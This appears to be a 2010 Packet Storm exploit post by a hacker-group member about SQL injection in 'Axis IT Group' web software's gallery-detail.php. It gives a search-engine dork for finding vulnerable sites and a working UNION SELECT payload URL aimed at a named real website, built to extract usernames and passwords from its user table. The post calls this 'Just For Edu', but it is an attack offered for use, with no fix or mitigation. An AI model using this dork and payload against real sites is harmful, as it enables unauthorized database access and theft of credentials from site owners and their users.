Axis IT Group SQL Injection

2010-06-25T00:00:00
ID PACKETSTORM:90987
Type packetstorm
Reporter DrgpxX
Modified 2010-06-25T00:00:00

Description

                                        
                                            `=====================================  
Axis IT Group SQL Injection Vulnerability  
=====================================  
  
  
Author :: DrgpxX  
Group :: Aras cyber Army  
Email :: DrgPxX@yahoo.com  
Discover :: 23 june 2010  
Critical Lvl :: high  
Publised :: 24 june 2010  
vender :: axisitgroup.com  
---------------------------------------------------------------------------  
Axis IT Group  
~~~~~~~~~  
  
Dork :: "Powered by Axis IT Group" inurl:gallery-detail.php  
  
~~~~~~~~~~~~~~~~~~  
  
demo :: http://www.target.com/gallery-detail.php?id=[sqli]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Example Just For Edu :: http://www.casiniranch.com/gallery-detail.php?id=-999.9%20UNION%20ALL%20SELECT%201,%28SELECT%20concat%28user.username,0x20,user.userpassword%29%20FROM%20%60casini%60.user%20LIMIT%200,1%29%20,3,4,5,6,7,8,9--  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
+++++++++++++++++++++++++++++++++++++++  
[!] greetiz to ::  
D3stan,hackfaz,mehdi,hamed.err000r  
All Muslim , Turkish , iranian hackers  
  
+++++++++++++++++++++++++++++++++++++++  
  
  
  
  
  
`